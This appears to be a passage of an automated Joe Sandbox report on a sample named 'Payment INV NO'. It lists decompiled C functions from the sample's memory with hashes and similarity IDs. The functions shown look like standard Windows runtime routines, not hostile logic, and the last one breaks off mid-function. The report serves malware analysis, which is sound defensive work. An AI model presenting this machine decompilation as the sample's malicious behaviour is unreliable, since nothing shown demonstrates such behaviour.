                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 4785a61bd2bfbf60eff30872c31ce150a85a56738f87c9a52af1651b3670b5a5
                                                          • Instruction ID: 16ed6adc658716077f3271d551474f7df18acc3769e754ae8b9cb46f8e116c0b
                                                          • Opcode Fuzzy Hash: 4785a61bd2bfbf60eff30872c31ce150a85a56738f87c9a52af1651b3670b5a5
                                                          • Instruction Fuzzy Hash: CE018B35210648ABDB35DF5DEC09FABFBF9EB84B10F15016DE90583190DAA1AA04CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01792D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 63%
                                                          			E01792D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1885350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1887bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E017D97C0();
				}
				if( *0x18879c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x18879c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E017C1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E017B7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							L0182FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E017D9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E017CE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L017EDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1886901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1886901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E017D9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E017D95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E017B7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E017B7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = L01817016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						L0182FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1885350;
							if(_t109 != 0x1885350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									L0182FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						L01825720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                          0x01792d8a
                                                          0x01792d8a
                                                          0x01792d92
                                                          0x01792d96
                                                          0x01792d9e
                                                          0x01792da0
                                                          0x01792da3
                                                          0x01792da5
                                                          0x01792da8
                                                          0x01792dab
                                                          0x01792db2
                                                          0x017ef9aa
                                                          0x017ef9ab
                                                          0x017ef9ae
                                                          0x017ef9ae
                                                          0x01792db8
                                                          0x01792dc2
                                                          0x017ef9b9
                                                          0x017ef9be
                                                          0x017ef9bf
                                                          0x017ef9bf
                                                          0x01792dcf
                                                          0x017ef9c9
                                                          0x01792dd5
                                                          0x01792dd5
                                                          0x01792dd5
                                                          0x01792dde
                                                          0x01792de1
                                                          0x01792e70
                                                          0x01792e72
                                                          0x01792e72
                                                          0x01792de7
                                                          0x01792deb
                                                          0x01792e7c
                                                          0x01792e83
                                                          0x01792e85
                                                          0x01792e8b
                                                          0x01792e8d
                                                          0x01792e92
                                                          0x01792e92
                                                          0x01792e85
                                                          0x01792df1
                                                          0x01792df7
                                                          0x01792df9
                                                          0x01792df9
                                                          0x01792dfc
                                                          0x01792dff
                                                          0x01792e02
                                                          0x00000000
                                                          0x01792e05
                                                          0x01792e0c
                                                          0x017ef9d9
                                                          0x01792e12
                                                          0x01792e12
                                                          0x01792e12
                                                          0x01792e1a
                                                          0x017ef9e3
                                                          0x017ef9e9
                                                          0x017ef9f0
                                                          0x017ef9f6
                                                          0x017ef9f8
                                                          0x017ef9f8
                                                          0x017ef9f0
                                                          0x01792e23
                                                          0x017efa02
                                                          0x017efa03
                                                          0x017efa05
                                                          0x017efa06
                                                          0x00000000
                                                          0x01792e29
                                                          0x01792e29
                                                          0x01792e2e
                                                          0x01792e34
                                                          0x01792e3e
                                                          0x00000000
                                                          0x00000000
                                                          0x01792e44
                                                          0x01792e47
                                                          0x01792e4d
                                                          0x00000000
                                                          0x00000000
                                                          0x01792e4f
                                                          0x01792e54
                                                          0x00000000
                                                          0x00000000
                                                          0x01792e5a
                                                          0x01792e5f
                                                          0x01792e9a
                                                          0x01792ea4
                                                          0x01792ea5
                                                          0x01792ea8
                                                          0x01792eaf
                                                          0x01792eb2
                                                          0x01792eb5
                                                          0x017efae9
                                                          0x017efaeb
                                                          0x017efaed
                                                          0x017efaef
                                                          0x017efaf7
                                                          0x017efaf8
                                                          0x017efafd
                                                          0x017efaff
                                                          0x017efb04
                                                          0x017efb04
                                                          0x017efaff
                                                          0x01792ec0
                                                          0x01792ec4
                                                          0x01792ec6
                                                          0x01792ec8
                                                          0x017efb14
                                                          0x017efb18
                                                          0x017efb1e
                                                          0x017efb21
                                                          0x017efb21
                                                          0x01792ece
                                                          0x01792ece
                                                          0x01792ece
                                                          0x01792ed7
                                                          0x01792e61
                                                          0x01792e63
                                                          0x017efa6b
                                                          0x017efa71
                                                          0x017efa76
                                                          0x017efa78
                                                          0x017efa8a
                                                          0x017efa7a
                                                          0x017efa83
                                                          0x017efa83
                                                          0x017efa8f
                                                          0x017efa91
                                                          0x017efa97
                                                          0x017efa9d
                                                          0x017efaa4
                                                          0x017efaaa
                                                          0x017efaaf
                                                          0x017efab1
                                                          0x017efac3
                                                          0x017efab3
                                                          0x017efabc
                                                          0x017efabc
                                                          0x017efac8
                                                          0x017efacb
                                                          0x017efadf
                                                          0x017efadf
                                                          0x017efacb
                                                          0x017efaa4
                                                          0x017efa91
                                                          0x01792e6f
                                                          0x01792e6f
                                                          0x01792e5f
                                                          0x017efa13
                                                          0x017efa15
                                                          0x017efa17
                                                          0x017efa1f
                                                          0x017efa21
                                                          0x017efa22
                                                          0x017efa25
                                                          0x017efa28
                                                          0x017efa2f
                                                          0x017efa2f
                                                          0x017efa2a
                                                          0x017efa2a
                                                          0x017efa2a
                                                          0x017efa31
                                                          0x017efa34
                                                          0x017efa36
                                                          0x017efa3c
                                                          0x017efa3e
                                                          0x017efa41
                                                          0x017efa43
                                                          0x017efa45
                                                          0x017efa45
                                                          0x017efa41
                                                          0x017efa3c
                                                          0x017efa4a
                                                          0x017efa4f
                                                          0x017efa51
                                                          0x017efa53
                                                          0x017efa56
                                                          0x017efa5b
                                                          0x017efa5e
                                                          0x00000000
                                                          0x017efa5e
                                                          0x01792e23

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Re-Waiting
                                                          • API String ID: 0-316354757
                                                          • Opcode ID: c4b6ca23269b57f32859d6598aa641072d014d9fa020665bb19c7d1113dea84d
                                                          • Instruction ID: c3ebafbcff172531a657d23d7b105c2056ac8ffc83dbab72c90269b3d2b5126c
                                                          • Opcode Fuzzy Hash: c4b6ca23269b57f32859d6598aa641072d014d9fa020665bb19c7d1113dea84d
                                                          • Instruction Fuzzy Hash: 77612331A00605ABEF32EF6CD888B7EFBF5EB49710F1406A9D6119B6C2C7349A44C781
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0179E620 Relevance: 1.4, Strings: 1, Instructions: 165COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 93%
                                                          			E0179E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0179F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E017D95D0();
						}
						if(_t78 != 0) {
							E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E017DFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E017DBB40(_t80,  &_v36, 0x1774d38);
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E017D9600();
					if(_t97 < 0) {
						goto L6;
					}
					E017DBB40(0,  &_v36, 0x1774d08);
					_push(0);
					_v48 = 4;
					_t97 = E0179F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E017DBB40(_t83, _t102 + 0x24, _t78);
								if(E017A43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E017DBB40(_t84, _t102 + 0x24, _t94);
									if(E017A43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                          0x0179e620
                                                          0x0179e628
                                                          0x0179e62f
                                                          0x0179e631
                                                          0x0179e635
                                                          0x0179e637
                                                          0x0179e63e
                                                          0x017f5503
                                                          0x017f5503
                                                          0x0179e64c
                                                          0x0179e64c
                                                          0x0179e651
                                                          0x00000000
                                                          0x00000000
                                                          0x0179e661
                                                          0x0179e665
                                                          0x017f542a
                                                          0x0179e715
                                                          0x0179e71a
                                                          0x0179e71c
                                                          0x0179e720
                                                          0x0179e720
                                                          0x0179e727
                                                          0x0179e736
                                                          0x0179e736
                                                          0x0179e743
                                                          0x0179e743
                                                          0x0179e673
                                                          0x0179e678
                                                          0x0179e67d
                                                          0x0179e682
                                                          0x0179e685
                                                          0x0179e692
                                                          0x0179e69b
                                                          0x0179e6a3
                                                          0x0179e6ad
                                                          0x0179e6b1
                                                          0x0179e6b2
                                                          0x0179e6bb
                                                          0x0179e6bf
                                                          0x0179e6c0
                                                          0x0179e6c8
                                                          0x0179e6cc
                                                          0x0179e6d5
                                                          0x0179e6d9
                                                          0x00000000
                                                          0x00000000
                                                          0x0179e6e5
                                                          0x0179e6ea
                                                          0x0179e6f9
                                                          0x0179e70b
                                                          0x0179e70f
                                                          0x017f5439
                                                          0x017f545e
                                                          0x017f545e
                                                          0x00000000
                                                          0x017f545e
                                                          0x017f543b
                                                          0x017f543e
                                                          0x017f5440
                                                          0x017f5445
                                                          0x017f5472
                                                          0x017f5475
                                                          0x017f548d
                                                          0x017f5493
                                                          0x017f54a9
                                                          0x00000000
                                                          0x00000000
                                                          0x017f54ab
                                                          0x017f54b4
                                                          0x017f54bc
                                                          0x017f54c8
                                                          0x017f54de
                                                          0x017f54fb
                                                          0x017f54e0
                                                          0x017f54e6
                                                          0x017f54eb
                                                          0x017f54eb
                                                          0x017f54de
                                                          0x00000000
                                                          0x017f54bc
                                                          0x017f5477
                                                          0x017f547a
                                                          0x017f5480
                                                          0x017f5483
                                                          0x017f5486
                                                          0x017f548b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017f548b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017f5447
                                                          0x017f5447
                                                          0x017f5447
                                                          0x017f5447
                                                          0x017f544e
                                                          0x00000000
                                                          0x00000000
                                                          0x017f5450
                                                          0x017f5452
                                                          0x017f5455
                                                          0x017f545a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017f545c
                                                          0x017f546a
                                                          0x017f546d
                                                          0x017f546f
                                                          0x00000000
                                                          0x017f546f
                                                          0x0179e70f

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 7d294098d2446270fc00c4956214e98e4d1c5b6dea0676837ee1458d69ae7e36
                                                          • Instruction ID: 43c4b3c3ade41a58be6de30e519ce2503a8a121bb84bd13ab8ac692aa77258ad
                                                          • Opcode Fuzzy Hash: 7d294098d2446270fc00c4956214e98e4d1c5b6dea0676837ee1458d69ae7e36
                                                          • Instruction Fuzzy Hash: 80518F726083469BDB14DF68D444A7BF7E8BF88614F45096EFA85D7240FB34D90887A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017CF0BF Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 75%
                                                          			E017CF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E017B4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E017D9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E017D9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E017D95D0();
							goto L11;
						} else {
							_t109 = E017B4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E017DF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
